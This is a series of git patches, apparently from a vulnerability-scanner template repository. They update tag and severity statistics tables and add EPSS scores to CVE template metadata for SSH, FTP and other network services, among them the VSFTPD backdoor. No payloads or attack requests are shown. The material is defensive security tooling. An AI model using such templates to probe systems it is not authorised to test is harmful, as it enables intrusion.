| | | | | | | | | +| fabswingers | 1 | | | | | | | | | +| kongregate | 1 | | | | | | | | | +| tarantella | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| modoboa | 1 | | | | | | | | | +| okidoki | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| flowdash | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| cd-action | 1 | | | | | | | | | +| carrdco | 1 | | | | | | | | | +| wp-jobsearch" | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| iframe | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| pop3 | 1 | | | | | | | | | +| pinterest | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| wpquery | 1 | | | | | | | | | +| aicloud | 1 | | | | | | | | | +| artists-clients | 1 | | | | | | | | | +| fine-art-america | 1 | | | | | | | | | +| amdoren | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| luci | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| ghostcms | 1 | | | | | | | | | +| lorsh-mastodon-instance | 1 | | | | | | | | | +| analytics | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| moxfield | 1 | | | | | | | | | +| currencyfreaks | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| streamlabs | 1 | | | | | | | | | +| openshift | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| openframe | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| shards | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| steller | 1 | | | | | | | | | +| smtp2go | 1 | | | | | | | | | +| global | 1 | | | | | | | | | +| noescape | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| hirak | 1 | | | | | | | | | +| jsmol2wp | 1 | | | | | | | | | +| bikemap | 1 | | | | | | | | | +| gallery | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| pewex | 1 | | | | | | | | | +| codeception | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| ucs | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| netris | 1 | | | | | | | | | +| ogugg | 1 | | | | | | | | | +| teknik | 1 | | | | | | | | | +| weheartit | 1 | | | | | | | | | +| wpify | 1 | | | | | | | | | +| 1001mem | 1 | | | | | | | | | +| pulsarui | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| cafecito | 1 | | | | | | | | | +| megamodelspl | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| 7dach | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| sumowebtools | 1 | | | | | | | | | +| jbzd | 1 | | | | | | | | | +| pcpartpicker | 1 | | | | | | | | | +| truth-social | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| cybrotech | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| simply-schedule-appointments | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| aflam | 1 | | | | | | | | | +| duolingo | 1 | | | | | | | | | +| ransomware | 1 | | | | | | | | | +| watcher | 1 | | | | | | | | | +| badarg | 1 | | | | | | | | | +| pokec | 1 | | | | | | | | | +| tildezone-mastodon-instance | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| webviewer | 1 | | | | | | | | | +| unsplash | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| prototype | 1 | | | | | | | | | +| arangodb | 1 | | | | | | | | | +| asciinema | 1 | | | | | | | | | +| parler-archived-posts | 1 | | | | | | | | | +| systemmanager | 1 | | | | | | | | | +| aero | 1 | | | | | | | | | +| webview | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| kubecost | 1 | | | | | | | | | +| master-elements | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| abbott | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| nvrmini | 1 | | | | | | | | | +| paytm | 1 | | | | | | | | | +| thetattooforum | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| public | 1 | | | | | | | | | +| blackbox | 1 | | | | | | | | | +| openview | 1 | | | | | | | | | +| mastodon-eu-voice | 1 | | | | | | | | | +| musiciansocial-mastodon-instance | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| jumpserver | 1 | | | | | | | | | +| duplicator | 1 | | | | | | | | | +| objectinjection | 1 | | | | | | | | | +| bodybuildingcom | 1 | | | | | | | | | +| pkp-lib | 1 | | | | | | | | | +| anonup | 1 | | | | | | | | | +| jmeter | 1 | | | | | | | | | +| directum | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| fotka | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| caton | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| api2convert | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| dash | 1 | | | | | | | | | +| onkyo | 1 | | | | | | | | | +| playsms | 1 | | | | | | | | | +| flyteconsole | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| react | 1 | | | | | | | | | +| f3 | 1 | | | | | | | | | +| mailman | 1 | | | | | | | | | +| mobiproxy | 1 | | | | | | | | | +| maroc-nl | 1 | | | | | | | | | +| lobsters | 1 | | | | | | | | | +| page-builder-add | 1 | | | | | | | | | +| cookie | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| xbox-gamertag | 1 | | | | | | | | | +| ldap-wp-login-integration-with-active-directory | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| keybase | 1 | | | | | | | | | +| trakt | 1 | | | | | | | | | +| datahub | 1 | | | | | | | | | +| iclock | 1 | | | | | | | | | +| phpldap | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| soloto | 1 | | | | | | | | | +| mastodon-polsocial | 1 | | | | | | | | | +| phpsocialnetwork | 1 | | | | | | | | | +| slides | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| muhttpd | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| pagekit | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| periscope | 1 | | | | | | | | | +| shutterstock | 1 | | | | | | | | | +| carbonmade | 1 | | | | | | | | | +| usa-life | 1 | | | | | | | | | +| scratch | 1 | | | | | | | | | +| smf | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| hestia | 1 | | | | | | | | | +| etsy | 1 | | | | | | | | | +| cdata | 1 | | | | | | | | | +| pie | 1 | | | | | | | | | +| 7cup | 1 | | | | | | | | | +| researchgate | 1 | | | | | | | | | +| myspace | 1 | | | | | | | | | +| mastodon-tootcommunity | 1 | | | | | | | | | +| nuovo | 1 | | | | | | | | | +| h5s | 1 | | | | | | | | | +| narnoo-distributor | 1 | | | | | | | | | +| yellowfin | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| picsart | 1 | | | | | | | | | +| ethereum | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| harmony | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| tabletoptournament | 1 | | | | | | | | | +| buymeacoffee | 1 | | | | | | | | | +| coinapi | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| headers | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| cryptocurrencies | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| slackholes | 1 | | | | | | | | | +| aerocms | 1 | | | | | | | | | +| opengraphr | 1 | | | | | | | | | +| mtheme | 1 | | | | | | | | | +| etoro | 1 | | | | | | | | | +| debounce | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| mongoose | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| mustache | 1 | | | | | | | | | +| psql | 1 | | | | | | | | | +| codestats | 1 | | | | | | | | | +| hanime | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| maximo | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| cashapp | 1 | | | | | | | | | +| chesscom | 1 | | | | | | | | | +| vmstio-mastodon-instance | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| blogipl | 1 | | | | | | | | | +| dss | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| calendar | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| osghs | 1 | | | | | | | | | +| xds | 1 | | | | | | | | | +| jobsearch | 1 | | | | | | | | | +| intellislot | 1 | | | | | | | | | +| termtalk | 1 | | | | | | | | | +| www-xml-sitemap-generator-org | 1 | | | | | | | | | +| cuteeditor | 1 | | | | | | | | | +| wp-ban | 1 | | | | | | | | | +| dcrat | 1 | | | | | | | | | +| kingdee | 1 | | | | | | | | | +| getmonero | 1 | | | | | | | | | +| uid | 1 | | | | | | | | | +| loancms | 1 | | | | | | | | | +| bestbooks | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| collibra-properties | 1 | | | | | | | | | +| gemweb | 1 | | | | | | | | | +| currencylayer | 1 | | | | | | | | | +| rtsp | 1 | | | | | | | | | +| orchard | 1 | | | | | | | | | +| iq-block-country | 1 | | | | | | | | | +| linuxorgru | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| albicla | 1 | | | | | | | | | +| routeros | 1 | | | | | | | | | +| moleculer | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| maillist | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| taskrabbit | 1 | | | | | | | | | +| prvpl | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| cachet | 1 | | | | | | | | | +| helmet-store-showroom | 1 | | | | | | | | | +| advfn | 1 | | | | | | | | | +| garmin-connect | 1 | | | | | | | | | +| forescout | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | +| droners | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| snapchat-stories | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| amp | 1 | | | | | | | | | +| redgifs | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| report | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| babel | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| anycomment | 1 | | | | | | | | | +| latency | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| multisafepay | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| rantli | 1 | | | | | | | | | +| suzuri | 1 | | | | | | | | | +| teespring | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| secui | 1 | | | | | | | | | +| citybook | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| mastodon-mstdnio | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| soundcloud | 1 | | | | | | | | | +| cves | 1 | | | | | | | | | +| bonga-cams | 1 | | | | | | | | | +| animeplanet | 1 | | | | | | | | | +| bandlab | 1 | | | | | | | | | +| poshmark | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| tigase | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| dericam | 1 | | | | | | | | | +| xanga | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| tapitag | 1 | | | | | | | | | +| elloco | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| mystic-stealer | 1 | | | | | | | | | +| sumo | 1 | | | | | | | | | +| brickset | 1 | | | | | | | | | +| webdav | 1 | | | | | | | | | +| webp | 1 | | | | | | | | | +| satellite | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| joomsport-sports-league-results-management | 1 | | | | | | | | | +| panels | 1 | | | | | | | | | +| pghero | 1 | | | | | | | | | +| airliners | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| aryanic | 1 | | | | | | | | | +| evilginx | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| stackhawk | 1 | | | | | | | | | +| exchangerateapi | 1 | | | | | | | | | +| txt | 1 | | | | | | | | | +| gpoddernet | 1 | | | | | | | | | +| codecademy | 1 | | | | | | | | | +| gift-voucher | 1 | | | | | | | | | +| ffserver | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| atechmedia | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| jobs | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| elmah | 1 | | | | | | | | | +| awx | 1 | | | | | | | | | +| campaignmonitor | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| inkbunny | 1 | | | | | | | | | +| internet-archive-user-search | 1 | | | | | | | | | +| titan-framework | 1 | | | | | | | | | +| hubpages | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| extremenetworks | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| blazor | 1 | | | | | | | | | +| transmission | 1 | | | | | | | | | +| girlfriendsmeet | 1 | | | | | | | | | +| litmindclub-mastodon-instance | 1 | | | | | | | | | +| subscribestar | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| netman | 1 | | | | | | | | | +| openhab | 1 | | | | | | | | | +| engage | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| quora | 1 | | | | | | | | | +| mailmap | 1 | | | | | | | | | +| tf2-backpack-examiner | 1 | | | | | | | | | +| ojs | 1 | | | | | | | | | +| web-suite | 1 | | | | | | | | | +| ocean-extra | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| pritunl | 1 | | | | | | | | | +| simple-urls | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| sofurry | 1 | | | | | | | | | +| sharingsphere | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| permissions | 1 | | | | | | | | | +| yelp | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| signet | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| fodors-forum | 1 | | | | | | | | | +| gozi | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| grandnode | 1 | | | | | | | | | +| juddi | 1 | | | | | | | | | +| semaphore | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| normhost | 1 | | | | | | | | | +| paneil | 1 | | | | | | | | | +| stestr | 1 | | | | | | | | | +| vimeo | 1 | | | | | | | | | +| openv500 | 1 | | | | | | | | | +| aveva | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| h2c | 1 | | | | | | | | | +| c99 | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| secure-copy-content-protection | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| devto | 1 | | | | | | | | | +| razer | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| trackmanialadder | 1 | | | | | | | | | +| emulator | 1 | | | | | | | | | +| zapier | 1 | | | | | | | | | +| nairaland | 1 | | | | | | | | | +| coderwall | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| blogmarks | 1 | | | | | | | | | +| mastodon-meowsocial | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| devrant | 1 | | | | | | | | | +| syncthru | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| wpb-show-core | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| backpack | 1 | | | | | | | | | +| liberty | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| go-ibax | 1 | | | | | | | | | +| properties | 1 | | | | | | | | | +| bugcrowd | 1 | | | | | | | | | +| omlet | 1 | | | | | | | | | +| casemanager | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| serialize | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| novus | 1 | | | | | | | | | +| okru | 1 | | | | | | | | | +| login-with-phonenumber | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| medium | 1 | | | | | | | | | +| teddygirls | 1 | | | | | | | | | +| cvsweb | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| chamsko | 1 | | | | | | | | | +| acs | 1 | | | | | | | | | +| phoenix | 1 | | | | | | | | | +| cnet | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| massage-anywhere | 1 | | | | | | | | | +| pagecdn | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| deluge | 1 | | | | | | | | | +| exposed | 1 | | | | | | | | | +| uvdesk | 1 | | | | | | | | | +| mysqld | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| kik | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| addon | 1 | | | | | | | | | +| u5cms | 1 | | | | | | | | | +| naturalnews | 1 | | | | | | | | | +| honeywell | 1 | | | | | | | | | +| vernemq | 1 | | | | | | | | | +| novius | 1 | | | | | | | | | +| sensu | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| kylin | 1 | | | | | | | | | +| brandfolder | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| simple-link-directory | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| alik | 1 | | | | | | | | | +| bokbot | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| completeview | 1 | | | | | | | | | +| biolink | 1 | | | | | | | | | +| golang | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| mastodonchasedemdev-mastodon-instance | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| docebo | 1 | | | | | | | | | +| osu | 1 | | | | | | | | | +| babypips | 1 | | | | | | | | | +| freelancer | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| easyscripts | 1 | | | | | | | | | +| blogspot | 1 | | | | | | | | | +| netvibes | 1 | | | | | | | | | +| visnesscard | 1 | | | | | | | | | +| taxonomies-change-checkbox-to-radio-buttons | 1 | | | | | | | | | +| senayan | 1 | | | | | | | | | +| wattpad | 1 | | | | | | | | | +| bitchute | 1 | | | | | | | | | +| aspx | 1 | | | | | | | | | +| diablo | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| telaen | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| hivequeue | 1 | | | | | | | | | +| goliath | 1 | | | | | | | | | +| coinmarketcap | 1 | | | | | | | | | +| accessmanager | 1 | | | | | | | | | +| quasar | 1 | | | | | | | | | +| nsq | 1 | | | | | | | | | +| intellifuel | 1 | | | | | | | | | +| lychee | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| soloby | 1 | | | | | | | | | +| axxon | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| ninja-forms | 1 | | | | | | | | | +| catalogcreater | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| utility | 1 | | | | | | | | | +| privatekey | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| chuangtian | 1 | | | | | | | | | +| orbiteam | 1 | | | | | | | | | +| adserver | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| easy-student-results | 1 | | | | | | | | | +| kotburger | 1 | | | | | | | | | +| efak | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| sentimente | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| somansa | 1 | | | | | | | | | +| airee | 1 | | | | | | | | | +| booth | 1 | | | | | | | | | +| spreadsheet-reader | 1 | | | | | | | | | +| hacker-news | 1 | | | | | | | | | +| hoobe | 1 | | | | | | | | | +| wbcecms | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| federatedpress-mastodon-instance | 1 | | | | | | | | | +| datezone | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| breach-forums | 1 | | | | | | | | | +| tekon | 1 | | | | | | | | | +| tembosocial | 1 | | | | | | | | | +| surveysparrow | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| 2kb-amazon-affiliates-store | 1 | | | | | | | | | +| faktopedia | 1 | | | | | | | | | +| http | 1 | | | | | | | | | +| connect | 1 | | | | | | | | | +| rss | 1 | | | | | | | | | +| wireless | 1 | | | | | | | | | +| socialbundde | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| pfblockerng | 1 | | | | | | | | | +| opencti | 1 | | | | | | | | | +| ztp | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| gofile | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| game-debate | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| shodan | 1 | | | | | | | | | +| diigo | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| mojoauth | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| moonpay | 1 | | | | | | | | | +| inaturalist | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| archive-of-our-own-account | 1 | | | | | | | | | +| hatenablog | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| verizon | 1 | | | | | | | | | +| nocodb | 1 | | | | | | | | | +| solikick | 1 | | | | | | | | | +| weebly | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| xvideos-models | 1 | | | | | | | | | +| barco | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| rumbleuser | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| gumroad | 1 | | | | | | | | | +| lichess | 1 | | | | | | | | | +| ko-fi | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| skyrock | 1 | | | | | | | | | +| easy | 1 | | | | | | | | | +| bitdefender | 1 | | | | | | | | | +| ftm | 1 | | | | | | | | | +| jedox | 1 | | | | | | | | | +| stonerssocial-mastodon-instance | 1 | | | | | | | | | +| blitapp | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| dotnetcms | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 11d23fd065..a9903d96b3 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1949 | dhiyaneshdk | 907 | http | 6047 | info | 2940 | file | 142 | -| panel | 958 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | -| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1113 | | | -| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 724 | | | -| xss | 695 | pdteam | 280 | ssl | 24 | low | 224 | | | +| cve | 1951 | dhiyaneshdk | 907 | http | 6050 | info | 2941 | file | 142 | +| panel | 959 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | +| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1114 | | | +| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 725 | | | +| xss | 696 | pdteam | 280 | ssl | 24 | low | 224 | | | | wp-plugin | 691 | pussycat0x | 261 | dns | 18 | unknown | 27 | | | | osint | 652 | geeknik | 221 | headless | 9 | | | | | | tech | 618 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 598 | ritikchaddha | 218 | TEMPLATES-STATS.json | 1 | | | | | -| lfi | 558 | 0x_akoko | 179 | cves.json | 1 | | | | | +| edb | 598 | ritikchaddha | 218 | cves.json | 1 | | | | | +| lfi | 558 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | From c3a5b64e6208b485ca5e3e258e84e40cea2359f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 09:55:02 +0000 Subject: [PATCH 551/609] Auto README Update [Sun Jul 9 09:55:02 UTC 2023] :robot: --- README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index acb7e70088..f87aeaac46 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1949 | dhiyaneshdk | 907 | http | 6047 | info | 2940 | file | 142 | -| panel | 958 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | -| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1113 | | | -| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 724 | | | -| xss | 695 | pdteam | 280 | ssl | 24 | low | 224 | | | +| cve | 1951 | dhiyaneshdk | 907 | http | 6050 | info | 2941 | file | 142 | +| panel | 959 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | +| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1114 | | | +| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 725 | | | +| xss | 696 | pdteam | 280 | ssl | 24 | low | 224 | | | | wp-plugin | 691 | pussycat0x | 261 | dns | 18 | unknown | 27 | | | | osint | 652 | geeknik | 221 | headless | 9 | | | | | | tech | 618 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 598 | ritikchaddha | 218 | TEMPLATES-STATS.json | 1 | | | | | -| lfi | 558 | 0x_akoko | 179 | cves.json | 1 | | | | | +| edb | 598 | ritikchaddha | 218 | cves.json | 1 | | | | | +| lfi | 558 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -**424 directories, 6769 files**. +**424 directories, 6772 files**. From 0e5fcfa57e0237b923954ee42b8ffe83fc701603 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 10 Jul 2023 09:25:11 +0900 Subject: [PATCH 552/609] Updated EPSS Score to CVE Templates Signed-off-by: GwanYeong Kim --- network/cves/2001/CVE-2001-1473.yaml | 1 + network/cves/2011/CVE-2011-2523.yaml | 1 + network/cves/2015/CVE-2015-3306.yaml | 1 + network/cves/2016/CVE-2016-2004.yaml | 1 + network/cves/2016/CVE-2016-3510.yaml | 6 ++++++ network/cves/2017/CVE-2017-5645.yaml | 4 ++++ network/cves/2018/CVE-2018-2628.yaml | 1 + network/cves/2018/CVE-2018-2893.yaml | 1 + network/cves/2020/CVE-2020-11981.yaml | 1 + network/cves/2022/CVE-2022-24706.yaml | 6 ++++++ 10 files changed, 23 insertions(+) diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index cba947b6ac..c4d5c14ad0 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -13,6 +13,7 @@ info: cvss-score: 7.4 cve-id: CVE-2001-1473 cwe-id: CWE-310 + epss-score: 0.002580000 remediation: Upgrade to SSH 2.4 or later. tags: cve,cve2001,network,ssh,openssh metadata: diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index 818f6ffe2f..0880e254a3 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -13,6 +13,7 @@ info: Update to the latest version of VSFTPD, which does not contain the backdoor. classification: cve-id: CVE-2011-2523 + epss-score: 0.981440000 metadata: max-request: 2 verified: true diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index c8994b6281..baa52f38c8 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -16,6 +16,7 @@ info: cvss-score: 10 cve-id: CVE-2015-3306 cwe-id: CWE-284 + epss-score: 0.969110000 tags: cve,cve2015,ftp,rce,network,proftpd,edb metadata: max-request: 2 diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 1f4194d9bf..d3272d42fb 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -15,6 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 + epss-score: 0.067930000 tags: cve,cve2016,network,iot,hp,rce,edb metadata: max-request: 